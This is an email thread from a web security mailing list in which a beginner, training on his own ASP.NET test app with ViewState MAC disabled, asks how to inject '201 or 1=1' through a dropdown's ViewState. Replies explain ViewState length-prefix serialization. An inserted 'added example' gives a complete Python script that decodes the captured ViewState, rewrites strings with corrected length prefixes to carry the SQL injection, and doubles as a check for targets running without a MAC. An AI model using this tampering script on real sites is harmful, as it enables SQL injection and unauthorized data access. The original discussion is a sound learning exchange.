Sorry, I realize my comment was pretty brief. In your case, the string to be modified is part of an array of strings, so you need to look for the length field elsewhere. I've highlighted a hint below, although the formatting might not survive the email list.
0000000: ff01 0f0f 050a 3130 3131 3735 3433 3234  ......1011754324
0000010: 0f64 1602 0203 0f64 1602 0201 0f10 0f16  .d.....d........
0000020: 061e 0d44 6174 6154 6578 7446 6965 6c64  ...DataTextField
0000030: 0503 4e6f 6d1e 0e44 6174 6156 616c 7565  ..Nom..DataValue
0000040: 4669 656c 6405 0849 645f 5669 6c6c 651e  Field..Id_Ville.
0000050: 0b5f 2144 6174 6142 6f75 6e64 6764 1015  ._!DataBoundgd..
0000060: 060a 4361 7361 626c 616e 6361 0552 6162  ..Casablanca.Rab
0000070: 6174 0453 6166 6906 5461 6e67 6572 0641  at.Safi.Tanger.A
0000080: 6761 6469 7205 5361 6669 6515 0603 3230  gadir.Safie...20
0000090: 3003 3230 3103 3230 3203 3230 3303 3230  0.201.202.203.20
00000a0: 3403 3230 3214 2b03 0667 6767 6767 6764  4.202.+..ggggggd
00000b0: 6418 0105 0947 7269 6456 6965 7731 0f3c  d....GridView1.<
00000c0: 2b00 0a01 0802 0164                      +......d
The general case of reverse engineering viewstate is quite interesting. Give me a week or so and I'll write up some notes about doing this in C++ with Boost Spirit on my web site (it's actually quite fun!)
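As an added example (this is not Mike's or Oussama's code, and not from any project named in the thread), the following Python script does what the reply above and Mike's earlier hint (quoted further down) describe: decode the MAC-less __VIEWSTATE value from the thread, locate the serialized strings, and rewrite one of them with its length prefix corrected, including the variable-length form used for lengths above 127. It assumes the ObjectStateFormatter token values Token_String = 0x05, Token_IndexedStringAdd = 0x1e and Token_StringArray = 0x15, and that string lengths use BinaryWriter's 7-bit encoding; only the 0x05/0x1e part of that is stated in the thread, the rest is an assumption of this example.

```python
# Added example for this thread (not code from the original messages).
# Assumptions not stated on the page: the ObjectStateFormatter token values
# Token_String = 0x05, Token_IndexedStringAdd = 0x1e, Token_StringArray = 0x15,
# and BinaryWriter's 7-bit variable-length encoding for string lengths.
import base64
import urllib.parse

TOKEN_STRING = 0x05
TOKEN_INDEXED_STRING_ADD = 0x1E
TOKEN_STRING_ARRAY = 0x15

# __VIEWSTATE value captured in the thread (enableViewStateMac=false, so no MAC).
VIEWSTATE_PARAM = (
    "%2FwEPDwUKMTAxMTc1NDMyNA9kFgICAw9kFgICAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQNOb20e"
    "DkRhdGFWYWx1ZUZpZWxkBQhJZF9WaWxsZR4LXyFEYXRhQm91bmRnZBAVBgpDYXNhYmxhbmNhBVJh"
    "YmF0BFNhZmkGVGFuZ2VyBkFnYWRpcgVTYWZpZRUGAzIwMAMyMDEDMjAyAzIwMwMyMDQDMjAyFCsD"
    "BmdnZ2dnZ2RkGAEFCUdyaWRWaWV3MQ88KwAKAQgCAWQ%3D"
)


def encode_7bit(n: int) -> bytes:
    """Length prefix as BinaryWriter.Write7BitEncodedInt writes it: low 7 bits
    first, high bit set on every byte except the last (so 127 -> 7f, 128 -> 80 01)."""
    out = bytearray()
    while n >= 0x80:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)


def decode_7bit(blob: bytes, pos: int) -> tuple[int, int]:
    """Read a 7-bit encoded int at pos; return (value, position after it)."""
    value = shift = 0
    while True:
        b = blob[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7


def decode_viewstate(param: str) -> bytes:
    """URL-decode, then base64-decode, the __VIEWSTATE form value."""
    return base64.b64decode(urllib.parse.unquote(param))


def encode_viewstate(blob: bytes) -> str:
    """Inverse of decode_viewstate: base64, then URL-encode for the form body."""
    return urllib.parse.quote(base64.b64encode(blob).decode("ascii"), safe="")


def read_string(blob: bytes, pos: int) -> tuple[str, int]:
    """A serialized string: 7-bit length, then that many UTF-8 bytes."""
    n, pos = decode_7bit(blob, pos)
    raw = blob[pos:pos + n]
    if len(raw) != n:
        raise ValueError("length prefix runs past the end of the blob")
    return raw.decode("utf-8"), pos + n


def string_arrays(blob: bytes) -> list[tuple[int, list[str]]]:
    """Heuristic scan for Token_StringArray: the token, a 7-bit count, then each
    string with its own length prefix but no per-string 0x05 token. That is why
    the dropdown values in the thread have only a length byte in front of them.
    A 0x15 byte that does not parse as printable strings is skipped as a false hit."""
    found = []
    for i, b in enumerate(blob):
        if b != TOKEN_STRING_ARRAY:
            continue
        try:
            count, pos = decode_7bit(blob, i + 1)
            items = []
            for _ in range(count):
                s, pos = read_string(blob, pos)
                if not s.isprintable():
                    raise ValueError("not text, probably a false hit")
                items.append(s)
            if items:
                found.append((i, items))
        except (ValueError, IndexError, UnicodeDecodeError):
            continue
    return found


def patch_string(blob: bytes, old: str, new: str, occurrence: int = 0) -> bytes:
    """Replace the n-th occurrence of `old` stored as (7-bit length + bytes) with
    `new`, rewriting the length prefix. Matching on the prefix together with the
    text avoids hitting the same characters inside a longer string. Works for
    0x05/0x1e string values and for string-array elements alike."""
    old_b, new_b = old.encode("utf-8"), new.encode("utf-8")
    needle = encode_7bit(len(old_b)) + old_b
    pos = -1
    for _ in range(occurrence + 1):
        pos = blob.find(needle, pos + 1)
        if pos < 0:
            raise ValueError(f"{old!r} not found as a length-prefixed string")
    return blob[:pos] + encode_7bit(len(new_b)) + new_b + blob[pos + len(needle):]


def inject(param: str, old: str, new: str, occurrence: int = 0) -> str:
    """Full round trip for the form value: decode, patch, re-encode."""
    return encode_viewstate(patch_string(decode_viewstate(param), old, new, occurrence))


if __name__ == "__main__":
    blob = decode_viewstate(VIEWSTATE_PARAM)
    for offset, items in string_arrays(blob):
        print(f"string array at 0x{offset:02x}: {items}")
    print(inject(VIEWSTATE_PARAM, "201", "201 or 1=1"))
```

The rewritten value is only accepted because enableViewStateMac is off; with the MAC in place the server rejects any edit, so the same script is also a quick check that a target really is running without one. The proxy recomputes Content-Length for the new body, so that header does not need hand-editing.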
--- On Thu, 4/28/11, Oussama Gabi oussama.gabi@gmail.com wrote:
From: Oussama Gabi oussama.gabi@gmail.com
Subject: Re: [WEB SECURITY] Numeric SQL injection ASP.NET
To: "Mike" mike@deadliestwebattacks.com
Cc: websecurity@lists.webappsec.org
Date: Thursday, April 28, 2011, 2:56 AM
Sorry, I didn't understand.
2011/4/27 Mike mike@deadliestwebattacks.com
Viewstate strings have a length field in the serialized form. So you'd need to append the "or 1=1" and adjust the length by 6 characters. In this simple hack, try looking for your string and a leading byte of 0x05 or 0x1e followed by a byte that indicates the length of the string.
(I've greatly simplified the description of viewstate serialization. For example, lengths greater than 127 bytes require an extra step to decode.)
From: Oussama Gabi
oussama.gabi@gmail.com
To: Erlend Oftedal erlend@oftedal.no
Cc: websecurity@lists.webappsec.org
Sent: Wednesday, April 27, 2011 2:47 AM
Subject: Re: [WEB SECURITY] Numeric SQL injection ASP.NET
Hello guys,
For testing I put the enableViewStateMac to false, now there is no hash at the end of the ViewState. Then I intercept the request with BurpProxy.
The ViewState code is %2FwEPDwUKMTAxMTc1NDMyNA9kFgICAw9kFgICAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQNOb20eDkRhdGFWYWx1ZUZpZWxkBQhJZF9WaWxsZR4LXyFEYXRhQm91bmRnZBAVBgpDYXNhYmxhbmNhBVJhYmF0BFNhZmkGVGFuZ2VyBkFnYWRpcgVTYWZpZRUGAzIwMAMyMDEDMjAyAzIwMwMyMDQDMjAyFCsDBmdnZ2dnZ2RkGAEFCUdyaWRWaWV3MQ88KwAKAQgCAWQ%3D
I get something like that when I decode it: ÿ1011754324ddDataTextFieldNomDataValueFieldId_Ville_!DataBoundgdCasablancaRabatSafiTangerAgadirSafie200201202203204202+ggggggdd GridView1<+ d
My goal is to add "or 1=1" to display all the cities with temperature. So I add it after the value selected in the dropdownlist, e.g. 201, so it will be "201 or 1=1", and I encode it all to base64.
But I got an error: session information is not valid...
I've tried to change the Content-Length in vain.
I know it's stupid, but I want to make this example.
This is my code: https://gist.github.com/943987
Do you have any ideas please?
Thank you
Best regards
Oussama GABI
2011/4/25 Erlend Oftedal erlend@oftedal.no
Hi
Sharing the code could be a good idea. Maybe put it up on github or
something.
Best regards,
Erlend
On 25.04.2011 17:38, Oussama Gabi wrote:
Yes, I've disabled the enableValidation; for the
ViewState I added EnableViewState=flase in the dropdownList
without any result.
The server response:
Status=OK - 200
Server=ASP.NET Development Server/10.0.0.0
Date=Mon, 25 Apr 2011 16:22:39 GMT
X-AspNet-Version=2.0.50727
Cache-Control=private
Content-Type=text/html; charset=utf-8
Content-Length=1331
Connection=Close
Thank you very much
2011/4/25 Ryan Dewhurst <ryandewhurst@gmail.com>
Is the ViewState and EventValidation being URL encoded when
being sent back to the server?
What is the HTTP response you are getting?
Ryan Dewhurst
blog www.ethicalhack3r.co.uk
projects www.dvwa.co.uk
| www.webwordcount.com
twitter www.twitter.com/ethicalhack3r
On Mon, Apr 25, 2011 at 1:15 PM, Oussama
Gabi <oussama.gabi@gmail.com>
wrote:
Hello guys,
I am a beginner in web application security, so I
started to train on WebGoat. I would like to make a
numeric SQL injection attack, but in ASP.NET.
So I created a dropdownlist that retrieves the
names of cities and a gridview for display!
The problem is when I change the ID value with
Tamper Data, nothing happens. I looked a bit and I
think that's a problem with ViewState, so is it
impossible to make this attack in ASP.NET?
How could I circumvent this ViewState or disable
it for testing? Or any hint!
Thank you !
Best regards!
_______________________________________________
The Web Security Mailing List
WebSecurity RSS Feed
http://www.webappsec.org/rss/websecurity.rss
Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
WASC on Twitter
http://twitter.com/wascupdates
websecurity@lists.webappsec.org
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org